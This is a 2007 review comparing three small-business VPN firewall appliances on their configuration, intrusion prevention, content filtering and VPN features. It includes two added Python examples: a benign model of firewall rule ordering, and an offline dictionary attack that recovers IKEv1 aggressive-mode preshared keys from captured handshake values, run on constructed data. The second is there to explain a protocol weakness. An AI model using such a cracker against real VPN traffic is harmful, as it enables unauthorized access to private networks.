VPN Firewalls for SMBs

These 3 network security appliances provide serious protection for small businesses

John Green

September 26, 2007

21 Min Read

Executive Summary:

John Green tests and compares three VPN firewall appliances for small-to-midsized businesses. NETGEAR's ProSafe VPN Firewall 200, SonicWALL's TZ 180 Wireless, and ZyXEL's ZyWALL 5 UTM all offer simplified implementation and Web-based management.

You know the dangers an online presence poses to your business: Theft of customer information is both a liability and a competitive problem, and applications that become unavailable disrupt vital revenue streams. If your small-to-midsized business (SMB) uses the Internet—and what business doesn't these days?—it needs a firewall. I set out to test firewall appliances suitable for SMBs. Appliances offer SMBs the benefits of simplified implementation and Web-based management.

As part of my selection criteria, I looked for products by companies that offer ICSA-certified firewall products. ICSA sets the standard for information security products, certifying most of the firewalls, VPNs, and antispyware and antivirus applications deployed today. For this review, I tested the ProSafe VPN Firewall 200 from NETGEAR, the TZ 180 Wireless from SonicWALL, and the ZyWALL 5 UTM from ZyXEL Communications.

All three companies offer products that are ICSA certified, though not all the products I tested are themselves certified. NETGEAR's ProSafe VPN Firewall 50 (FVS338) and ProSafe VPN Firewall 100 (FVL328) are ICSA certified; the ProSafe VPN Firewall 200 is not. SonicWALL's TZ 170 series VPN firewall appliances have received ICSA certification, and the company is pursuing certification of the TZ 180. The ZyXEL ZyWALL 5 UTM is ICSA certified.

After I chose the products to review, I realized that all of them also include VPN functionality, so I also looked at their VPN capabilities as I tested.

Both the TZ 180 and the ZyWALL 5 are Unified Threat Management (UTM) appliances that offer application-layer monitoring (sometimes called deep packet inspection) features. NETGEAR's ProSafe 200 is a basic VPN firewall appliance at a lower price. All the appliances offer VPN support and firewall features that have been available for some time, including stateful packet inspection that can detect Denial of Service (DoS) attacks.

Although designed for networking novices, these are advanced firewall products, and some networking expertise is required to use them to their best advantage. I recommend that a knowledgeable network administrator install the appliance and establish a restrictive intrusion prevention configuration, then do follow-up log monitoring to be sure you're getting the results you want and adjust the configuration if it's too restrictive. This approach is preferable to starting with a more open configuration, which promotes a potentially false sense of security.

ProSafe VPN Firewall 200
The ProSafe 200 is in a different class from the other products I reviewed, in that it lacks UTM features. Physical connectivity includes dual 10/100 Ethernet WAN ports, eight 10/100 Ethernet LAN ports, one Gigabit Ethernet LAN port, and a serial port for console access. The ProSafe supports 200 VPN connections with a Triple DES (3DES) throughput rate specification of 60Mbps and comes with a five-user license for NETGEAR’s ProSafe VPN client.

Installation and initial configuration of the ProSafe 200 was typical—I plugged in my ISP connection and a computer configured for DHCP, powered up the appliance, connected to the default address, and began configuration. Basic configuration of LAN and WAN ports was routine. I like to use PDF documentation, but the CD-ROM that accompanied the router didn’t have a copy of the ProSafe 200 manual. I downloaded the manual from NETGEAR's Web site, and it helped a lot.

Network Address Translation (NAT) is typically enabled on the ProSafe for LAN traffic, but you can turn it off and operate in a standard routing mode. By default, the ProSafe has only two rules: Allow all traffic from the LAN to the WAN, and allow WAN-to-LAN traffic only for LAN-initiated sessions (that is, only return traffic the stateful inspection engine can match to an existing session). Configuring additional rules isn't difficult. Three tabs support rules for LAN-to-WAN, LAN-to-demilitarized zone (DMZ), and DMZ-to-WAN traffic. In each case, you can configure Inbound and Outbound rules, as Figure 1 shows. To me, the "inbound" and "outbound" terminology was a bit confusing compared with the "to" and "from" structure used elsewhere. The ProSafe 200 defines several TCP and UDP services and lets you add custom service definitions. However, it doesn't display the full configuration of predefined services; the protocol and port number, for example, aren't visible, so you can't verify what a named service actually opens without consulting the documentation. Although the procedure for configuring the firewall was certainly workable, I consider others easier to configure.

Because the ProSafe doesn't have special support for wireless access, I reconfigured my wireless router to connect to the appliance's LAN port, and that configuration worked. The dual WAN ports can be set up for either a failover configuration or a load-balancing configuration. In both cases, the two WAN ports always have their own IP addresses. When failover occurs, existing VPN connections collapse and must be reestablished by the originating user or device against the other WAN address. You implement a load-balancing configuration by arranging to have some users connect to the first port while others connect to the second port, or by dedicating one port to inbound traffic and the other to outbound traffic.

The ProSafe 200 supports content filtering by keyword, which you implement by specifying a list of keywords to scan for. Content filtering causes the appliance to block the display of Web pages that contain any of the specified keywords. You can assign network hosts to one of eight groups, either by fixed IP address or by DHCP reservation, then enable keyword blocking for one or more of the groups. The ProSafe discovers systems on the local network segment to ease initial configuration. In my testing, results were inconsistent—I configured keywords that I knew existed at a specific URL, but sometimes the ProSafe 200 still allowed the Web page to be displayed.

NETGEAR's product offers both network-to-network and client-to-network VPN tunnels, which you configure by using the Web administrative interface. The supported standards and protocols include both main and aggressive Internet Key Exchange (IKE) negotiation; Advanced Encryption Standard (AES) with 128-bit, 192-bit, and 256-bit key lengths, as well as DES and 3DES; SHA-1 and MD5 hash algorithms for packet authentication; and extended authentication (XAUTH) of users against both locally defined accounts and a Remote Authentication Dial-In User Service (RADIUS) server. The appliance uses the Diffie-Hellman key exchange protocol, with support for groups 1, 2, and 5 (768-, 1,024-, and 1,536-bit MODP moduli, respectively; these are key-exchange group sizes, not the symmetric encryption key lengths).

You can define Mode Config Records, which are used to specify pools of IP addresses to assign to client VPN endpoints. Mode Config Records operate similarly to the way DHCP assigns addresses to network clients, but the ProSafe doesn’t support standard DHCP address assignment. Figure 2 shows the IKE policy configuration page. The ProSafe doesn’t support automatically reinstated (aka "nailed-up") connections, requiring instead that you cause traffic to use the connection at regular intervals to avoid a timeout. Certificate support includes use of imported and self-generated certificates.

The ProSafe 200's VPN wizard simplifies configuring VPN connections. The wizard assumes use of a preshared key rather than certificates, which eases setup. After creating a policy with the wizard, you can customize the policy using the standard VPN configuration pages. VPN activities are logged on the VPN Logs page of the Web interface.

The router ships with five licenses for VPN client software, which includes a full-featured certificate manager and is well documented in a 212-page reference manual. Dual WAN interfaces let you configure both client and network-to-network connections with a backup path for the VPN tunnel.

Some of the ProSafe's features left me wanting. Its configuration is a little less friendly than the other products', and the keyword-based content filtering isn’t anything to write home about. Although I find it hard to give this unit a strong recommendation in comparison to the other products I reviewed, its dual WAN connectivity and support for 200 VPN endpoints at a price comparable to the non-UTM version of the ZyWALL 5 might make heavy VPN users want to consider it.

TZ 180 Wireless
The TZ 180 Wireless is the midrange product in SonicWALL’s TZ product line. Although it’s physically the smallest of the three products I review here, it packs a lot into its small package. Physical connections include five LAN ports and a WAN port. Console ports and optional ports are also present, but you must purchase SonicOS Enhanced to enable them.

The TZ 180 performs application-layer inspection of incoming data streams; provides antivirus, antispyware, and intrusion detection; and boasts a deep-packet-inspection throughput rate of 10Mbps. Its VPN features support both client and gateway operation with throughput rates of 30Mbps. The wireless LAN provides 802.11b/g operation and supports a full complement of current security standards, including the IEEE 802.1X port-based network access control standard. SonicWALL also offers a version of the TZ 180 without wireless LAN support.

You can choose from two licenses for the TZ 180: one to protect up to 10 network nodes and another for up to 25 network nodes. The 10-node license includes support for two site-to-site VPN connections and five client-computer VPN connections; you must purchase SonicWALL's VPN client software separately. The TZ 180 also works with other standard VPN clients. The 25-node license allows 10 site-to-site VPN connections and 25 client-computer VPN connections and includes one VPN client software license. The appliance I reviewed ran SonicOS Standard 3.8; SonicWALL also offers SonicOS Enhanced, which has additional capabilities.

To install the TZ 180, I connected a computer to the appliance, and the TZ 180’s DHCP server provided the computer with an IP address, letting me connect to the appliance's browser-based management interface. A setup wizard guided me through basic configuration of the WAN, LAN, and wireless interfaces. I found configuring the wireless interface as easy as any wireless router I’ve used, and its integration with the other security features really eased overall administrative effort.

To unlock the advanced security features, I had to register the appliance with SonicWALL. You can do this directly from the administrative interface or manually from the SonicWALL Web site. First, I had to request a user ID on the vendor's Web site. The confirming email presented me with a registration link, which I used to register the appliance. However, the TZ 180 still considered itself unregistered. It turns out I needed to copy a keyset character string from the Web site into the TZ 180 administrative interface, which wasn’t clearly documented in the Getting Started Guide.

I still had problems enabling the antivirus, antispyware, and intrusion detection capabilities because the TZ 180 reported that the required signature files weren’t downloading. SonicWALL's technical support quickly corrected the problem.

The TZ 180 installs with a set of access rules that give LAN hosts full access to all networks and restrict traffic originating on WAN and wireless LAN ports. Using the Web interface, you can easily create new access rules for a specific address or a range of addresses. Common TCP and UDP services are predefined, and you can add others. You can store access rules by leaving them in a disabled state, for occasional implementation. For example, if you occasionally want to manage the unit from a WAN address, you can create a rule that allows HTTPS management via the WAN interface, then activate the rule only when you need to. You can also configure access rules to be active only during a specified time of day and day of the week and to enforce minimum and maximum bandwidth utilization limits.

The appliance I tested doesn’t support the concept of a DMZ. With the upgrade to SonicOS Enhanced, the OPT (optional) port becomes another network interface on a par with the LAN, WAN, and wireless LAN (WLAN) interfaces and can be configured as a DMZ.

SonicWALL bundles antivirus, antispam, and intrusion prevention subscriptions in a single subscription product that's included with the TZ 180. SonicWALL develops detection signatures both internally and with the assistance of third-party sources. I counted 43 categories of intrusion prevention signatures, each category containing many attack signatures. For ease of implementation, the TZ 180 classifies each signature as low, medium, or high priority and lets you configure each priority for simple detection, prevention, or both. To fine-tune the protection, you can configure individual signatures and specify whether detection and prevention events of each signature should be logged.

The helpful logging screen, which Figure 3 shows, displays prevention responses in yellow. Clicking a prevention response displays the configuration screen for the signature, letting you quickly reconfigure the response in the log if you wish. I configured prevention for all three priorities and quickly discovered that some applications stopped working. By reconfiguring to detect but not prevent the signature that caused an application to stop working, I was able to maintain security and restore the applications to operation.

SonicWALL offers two levels of content filtering: Standard and Premium. The Standard option supports 12 content categories. I tested the Premium version, which supports 56 categories of content and lets you configure varying access levels for different users and groups. Selecting all the categories seemed to block access to all Web sites except SonicWALL's. Reconfiguring, I blocked only those topics that we hear make poor party conversation: government and religion. The TZ 180 duly prohibited my access to church and government sites.

You can view the event logs through the administrative interface and manually export them to a file. You can also configure the appliance to send log records to a syslog server and to periodically send collected log records to an email address.

VPN support includes a full complement of VPN-related standards and features: AES encryption at 128, 192, and 256 bits as well as DES and 3DES encryption; MD5 and SHA-1 hash algorithms for packet authentication; manual keying and IKE with preshared keys or certificates (using imported or locally generated certificates); Diffie-Hellman key exchange with support for groups 1, 2, and 5; extended user authentication using RADIUS and local user accounts; and the ability to pass NetBIOS traffic. SonicWALL offers its own Global Security Client, but the appliance's VPN features will work with most standards-based VPN clients.

The TZ 180's advanced options include bandwidth management for VPN traffic, routing and forwarding of VPN traffic, and the ability to apply NAT and firewall rules to a VPN tunnel. Remote clients have the option of obtaining their IP addresses via local DHCP. You can also configure IP network services and remote network addresses to bypass user security association (SA) authentication, as Figure 4 shows.

A VPN policy wizard simplifies policy creation and offers a Typical mode with few options exposed and a Custom mode that lets you configure additional protocol options. After you create a policy, you can set all options using the standard Web administration screens. The TZ 180 arrives with a predefined GroupVPN policy, used with L2TP client connections. Although you can modify the GroupVPN policy, you can't delete it. You can have a maximum of three defined policies, including the GroupVPN policy. Considering that you can create VPN policies in Disabled mode, the three-policy limit seemed unnecessarily restrictive.

ZyWALL 5 UTM
The ZyWALL is the entry-level model of three appliances in ZyXEL’s UTM VPN firewall product line. It has one WAN port and four 10/100 Ethernet ports individually configurable for LAN, DMZ, or WLAN connectivity. Serial ports provide dial-up backup WAN connectivity and a console connection. The ZyWALL dedicates the processor on the ZyWALL Turbo Card, a PC Card that installs into the appliance's single expansion slot, to application-layer scanning for intrusion and virus detection.

The ZyWALL applies intrusion prevention technology developed in-house and implements Kaspersky Lab antivirus technology, the Mailshell antispam engine, and content filtering from Blue Coat Systems. Both the firewall and VPN features are ICSA certified. ZyXEL publishes basic firewall throughput rates of 65Mbps; VPN 3DES/AES throughput rate is 25Mbps with up to 10 simultaneous IPsec VPN connections. The throughput rate for UTM features, which use a streaming rather than store-and-forward implementation, is 12Mbps.

Installation proceeded easily. I inserted the Turbo Card, plugged in the connection cables for my Internet connection and the computer I would use for initial configuration, and powered up the appliance. The appliance's built-in DHCP server supplied an IP address to the computer, and I used Microsoft Internet Explorer to connect to the ZyWALL's Web interface. The WAN interface received its configuration from my ISP. I configured two of the four LAN ports for simple LAN use, one port for DMZ attachment, and one port for WLAN use. For a few frustrating moments my wireless notebook couldn’t access my LAN-based server, then I realized that the WLAN is configured by default to access only WAN destinations.

The ZyWALL's basic firewall configuration is easy. A From/To matrix, which Figure 5 shows, lets you configure, for example, traffic originating on the WLAN and addressed to a WLAN, WAN, LAN, DMZ, or VPN destination to be permitted, blocked, or dropped. A check box for each combination lets you specify whether logging will occur for the rule. The Service tab lets you define custom TCP/UDP service ports to augment the predefined set, and a Rule Summary tab lets you create custom firewall rules. Rule options allow the ZyWALL to drop, permit, or reject matching packets; other options let you enable logging and alerts. Day-of-week check boxes and a time-of-day range let you specify when the rule is active. Unlike the TZ 180, which automatically ordered custom firewall rules, the ZyWALL has you manually order them within each source/destination pair. In most cases this is just extra work, but the ability to order rules matters when a narrow rule must take precedence over a broad one: a general permit placed above a specific drop silently makes the drop dead, so check the order after every change.
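To make the rule-evaluation semantics concrete, here is an added Python model of the From/To zone matrix and per-pair ordered rule chains described above, with the stored-but-disabled rules and day/time schedules described for the TZ 180. It is example code written for this review, not ZyXEL or SonicWALL firmware; the zone names, rule names, ports and the "LAN reaches everything, WLAN reaches only the WAN" defaults are assumptions chosen to mirror the text, and `shadowed_rules` is a check I added to catch the ordering mistake the paragraph warns about.

```python
"""Zone-matrix firewall evaluator (constructed illustration, not vendor code)."""
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional, Tuple

PERMIT, DROP, REJECT = "permit", "drop", "reject"
WEEKDAY_NOON = datetime(2007, 9, 26, 12, 0)   # a Wednesday
SUNDAY_NIGHT = datetime(2007, 9, 30, 22, 0)


@dataclass(frozen=True)
class Packet:
    src_zone: str
    dst_zone: str
    proto: str          # "tcp" or "udp"
    dport: int


@dataclass
class Rule:
    name: str
    action: str
    proto: Optional[str] = None              # None = any protocol
    dport: Optional[int] = None              # None = any destination port
    enabled: bool = True                     # stored but inactive when False
    days: Optional[frozenset] = None         # weekday numbers 0=Mon..6=Sun, None = every day
    hours: Optional[Tuple[int, int]] = None  # (start_hour, end_hour), None = all day
    log: bool = False

    def covers(self, other: "Rule") -> bool:
        """True if every packet matching `other` also matches self (schedule ignored)."""
        return ((self.proto is None or self.proto == other.proto)
                and (self.dport is None or self.dport == other.dport))

    def active_at(self, now: datetime) -> bool:
        if not self.enabled:
            return False
        if self.days is not None and now.weekday() not in self.days:
            return False
        if self.hours is not None and not (self.hours[0] <= now.hour < self.hours[1]):
            return False
        return True

    def matches(self, pkt: Packet, now: datetime) -> bool:
        return (self.active_at(now)
                and (self.proto is None or self.proto == pkt.proto)
                and (self.dport is None or self.dport == pkt.dport))


class ZonePolicy:
    """Default action per (from, to) zone pair plus an ordered rule chain per pair."""

    def __init__(self) -> None:
        self.default: Dict[Tuple[str, str], str] = {}
        self.rules: Dict[Tuple[str, str], List[Rule]] = {}

    def set_default(self, src: str, dst: str, action: str) -> None:
        self.default[(src, dst)] = action

    def add_rule(self, src: str, dst: str, rule: Rule) -> None:
        self.rules.setdefault((src, dst), []).append(rule)   # manual ordering: append order wins

    def evaluate(self, pkt: Packet, now: datetime) -> Tuple[str, str]:
        """First matching active rule wins; otherwise the matrix default (fail closed if unset)."""
        key = (pkt.src_zone, pkt.dst_zone)
        for rule in self.rules.get(key, []):
            if rule.matches(pkt, now):
                return rule.action, rule.name
        return self.default.get(key, DROP), "default"

    def shadowed_rules(self, src: str, dst: str) -> List[str]:
        """Rules that can never fire because an earlier, always-active rule covers them."""
        chain = self.rules.get((src, dst), [])
        shadowed = []
        for i, rule in enumerate(chain):
            for earlier in chain[:i]:
                if earlier.enabled and earlier.days is None and earlier.hours is None \
                        and earlier.covers(rule):
                    shadowed.append(rule.name)
                    break
        return shadowed


def build_demo_policy(telnet_block_first: bool) -> ZonePolicy:
    """Matrix modelled on the review (assumed values): WLAN reaches only the WAN by
    default, LAN reaches everything, WAN is dropped except a published HTTPS host
    in the DMZ. The LAN->DMZ chain is 'allow all except telnet' in either order."""
    p = ZonePolicy()
    zones = ["LAN", "WLAN", "DMZ", "WAN"]
    for s in zones:
        for d in zones:
            p.set_default(s, d, DROP)
    for d in zones:
        p.set_default("LAN", d, PERMIT)
    p.set_default("WLAN", "WAN", PERMIT)
    p.set_default("DMZ", "WAN", PERMIT)
    p.add_rule("WAN", "DMZ", Rule("publish-https", PERMIT, "tcp", 443, log=True))
    p.add_rule("WAN", "LAN", Rule("mgmt-https", PERMIT, "tcp", 443, enabled=False))  # stored, off
    p.add_rule("WLAN", "LAN", Rule("wlan-intranet", PERMIT, "tcp", 8080,
                                   days=frozenset(range(5)), hours=(8, 18)))        # weekdays 8-18
    permit_all = Rule("lan-dmz-any", PERMIT)
    drop_telnet = Rule("drop-telnet", REJECT, "tcp", 23, log=True)
    for r in ([drop_telnet, permit_all] if telnet_block_first else [permit_all, drop_telnet]):
        p.add_rule("LAN", "DMZ", r)
    return p
```

`build_demo_policy(False)` reproduces the mistake: `shadowed_rules("LAN", "DMZ")` reports `drop-telnet`, and a telnet packet is permitted by `lan-dmz-any`. With `telnet_block_first=True` the same packet is rejected. The disabled `mgmt-https` rule never matches, and `wlan-intranet` matches on a weekday at noon but falls through to the WLAN-to-LAN default on Sunday night.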

Antivirus, antispam, intrusion detection and prevention, and content-filtering subscriptions are available separately, and you need to subscribe to continuing signature-file updates to maintain protection against new viruses and styles of network attacks. To help you manage the processing load that application-layer scanning places on the system, you can selectively enable antivirus, antispam, and intrusion detection and prevention by selecting check boxes on an interface that has a To/From matrix, similar to the way you enable traffic between interfaces on the firewall. Antivirus configuration gives you a bit more granularity, letting you selectively enable scanning between every pair of interfaces for each of four network services: HTTP, FTP, POP3, and SMTP.

For intrusion detection and prevention, I counted 12 classes of attack signatures, each class being a container for many individual signatures. Every signature is configurable—you can drop the packet when the signature is found or drop the balance of the TCP session (both silently), or you can drop the session, sending TCP Reset packets to the source and/or destination IP addresses. Other options let you deactivate a signature so the ZyWALL doesn’t scan for it or send an email alert when the signature is found. You can configure the appliance to automatically update intrusion-detection and -prevention signatures, which also updates antivirus signatures.

I enabled content filtering and found it easy to customize. The ZyWALL doesn’t support different content-filtering rules for different classes of users, which is more of an enterprise feature. However, you can specify a list of IP addresses to be excluded from or included in content filtering.

When content filtering is enabled, the ZyWALL forwards a user's first reference to a Web site in a query to the Blue Coat Systems database and waits up to 10 seconds for the result of the query before displaying the requested page. In my tests against widely used media Web sites, there was no noticeable delay before either the Web page or a "Blocked" message was displayed. The database results are held in local cache until the ZyWALL restarts or the record ages out (by default, after 72 hours). If the Web site is in a blocked category, it's blocked, blocked and logged, or simply logged, depending on the configuration. You can also configure your own lists of allowed and prohibited Web sites and can block sites containing specific keywords. In my tests, content filtering was effective, blocking URL-based email content as well as browser-based displays.

Although there's a lot of granularity in your ability to configure what's logged and when an event will generate an alert, the ZyWALL's logging and notification facilities are otherwise pretty basic. You can specify an email address to receive accumulated log records, another email address to receive alerts, and a syslog server to receive all records. For intrusion detection and prevention events, the ZyWALL's log display includes a link to more information.

The ZyWALL's VPN feature set supports both manual key exchange and IKE using preshared keys or certificates; DES, 3DES, and AES encryption standards; SHA-1 and MD5 hash algorithms for packet authentication; IPsec NAT traversal; and user authentication using a RADIUS server or users defined internally to the ZyWALL. As noted earlier, VPN 3DES and AES throughput is rated at 25Mbps with up to 10 simultaneous IPsec VPN connections. The ZyWALL supports both gateway (remote network to local network) and client (computer to local network) tunnels. The ZyWALL also supports a high-availability configuration, in which you configure a remote router for a gateway connection in the event that the primary router fails.

You define and configure VPN endpoints using the ZyWALL's Web interface. VPN rules, which Figure 6 shows, define both the security parameters used to establish a secure connection and which networks and devices on both ends of the link can use the tunnel. For the IKE phase 1 exchange, the ZyWALL supports both main mode and aggressive mode. Aggressive mode completes in three messages instead of six, but it sends the peer identities and the responder's authentication hash unencrypted; with preshared keys, anyone who captures that exchange can test password guesses against the hash offline, which is why it counts as less secure and why it should be paired with a long random key or, better, with certificates. The ZyWALL uses Diffie-Hellman key exchange and supports groups 1 and 2 (768- and 1,024-bit MODP moduli). It supports nailed-up connections and gives you the option to pass NetBIOS broadcast traffic, allowing NetBIOS-based network discovery. Another set of screens lets you import and export certificates used for authentication at both ends of the tunnel, including self-signed certificates that the ZyWALL can generate upon request. Because the VPN engine is ICSA certified, it works with any ICSA-certified VPN client. The ZyWALL itself doesn't include any VPN client software licenses.
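All three appliances in this review support IKE aggressive mode with preshared keys (the ProSafe 200 and TZ 180 are described above; the ZyWALL here), so it is worth seeing exactly what that exposes. The following added Python example, which is not ZyXEL, NETGEAR or SonicWALL code and applies to any IKEv1 implementation, reproduces the RFC 2409 preshared-key authentication math for the HMAC-SHA1 prf (SKEYID and HASH_R), builds a constructed stand-in for what a passive observer captures from aggressive-mode messages 1 and 2 (cookies, nonces, Diffie-Hellman public values, the SA payload, the responder identity and the cleartext HASH_R), and runs the offline dictionary attack that cleartext hash allows. The nonce, cookie and DH values are deterministic fillers, the identity and wordlist are constructed, and the real exchange carries these fields inside ISAKMP payloads that the code does not parse. In main mode, HASH_R travels encrypted, so the same capture gives the attacker nothing to test guesses against.

```python
"""IKEv1 aggressive-mode PSK exposure, simulated offline on constructed values."""
import hashlib
import hmac
from typing import Dict, Iterable, Optional


def prf(key: bytes, data: bytes) -> bytes:
    """RFC 2409 prf for the SHA hash attribute is HMAC-SHA1."""
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid_psk(psk: bytes, ni: bytes, nr: bytes) -> bytes:
    """SKEYID for preshared-key authentication: prf(PSK, Ni_b | Nr_b)."""
    return prf(psk, ni + nr)


def hash_r(psk: bytes, c: Dict[str, bytes]) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    skeyid = skeyid_psk(psk, c["ni"], c["nr"])
    return prf(skeyid, c["g_xr"] + c["g_xi"] + c["cky_r"] + c["cky_i"]
               + c["sai_b"] + c["idir_b"])


def _fill(label: str, n: int) -> bytes:
    """Deterministic constructed filler standing in for random protocol values."""
    out = b""
    while len(out) < n:
        out += hashlib.sha256(label.encode() + len(out).to_bytes(2, "big")).digest()
    return out[:n]


def make_capture(psk: bytes) -> Dict[str, bytes]:
    """What an on-path observer sees in aggressive-mode messages 1 and 2 (constructed).
    Only HASH_R depends on the secret PSK; everything else is sent in the clear."""
    c = {
        "cky_i": _fill("cookie-initiator", 8),
        "cky_r": _fill("cookie-responder", 8),
        "ni": _fill("nonce-initiator", 20),
        "nr": _fill("nonce-responder", 20),
        "g_xi": _fill("dh-public-initiator", 128),   # 1,024-bit group 2 value
        "g_xr": _fill("dh-public-responder", 128),
        "sai_b": _fill("sa-payload-body", 56),       # initiator's SA payload body
        # IDir_b: ID type 2 (ID_FQDN), protocol 17, port 500, then a constructed name
        "idir_b": b"\x02\x11\x01\xf4" + b"vpn.example.test",
    }
    c["hash_r"] = hash_r(psk, c)   # the responder computes this with the real PSK
    return c


def crack_psk(capture: Dict[str, bytes], wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack: recompute HASH_R per guess and compare to the capture."""
    for guess in wordlist:
        if hmac.compare_digest(hash_r(guess, capture), capture["hash_r"]):
            return guess
    return None


WORDLIST = [b"password", b"123456", b"vpn", b"letmein", b"company", b"branch1"]  # constructed
```

A weak key such as `letmein` falls to a six-word list; a long random key survives it, but only because the list is short. Nothing about the appliance stops the attack once aggressive mode with a preshared key is in use, which is why certificates (or main mode, where the peer has a fixed address) are the better choice for the site-to-site tunnels these products target.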

The Editor’s (Difficult) Choice
I found it difficult to award an Editor's Choice for this review. Both the TZ 180 and the ZyWALL appliances were strong performers, and I believe both would work well for SMBs.

If ease of use and administration is a big concern, I suggest the TZ 180. Its integrated wireless access point is a real bonus for businesses that have limited inhouse technical expertise.

My personal choice, however, is the ZyWALL. I really like the configuration flexibility it offers, even though configuration was a bit more work. Its check box approach to configuring many aspects of scanning is easy to use and affords a high degree of granularity in setup. I also like the use of third-party scanning engines ("best of breed" is ZyXEL's take on it), as I have more confidence in products that are part of a company's key mission rather than a supporting activity. The ZyWALL's dedication of the Turbo Card's processor to application-layer scanning is also appealing. The major weakness I see is that its lack of integrated wireless LAN support leaves traffic between wireless devices unscanned. However, the positive qualities outweigh that weakness, and ZyWALL is my Editor's Choice.
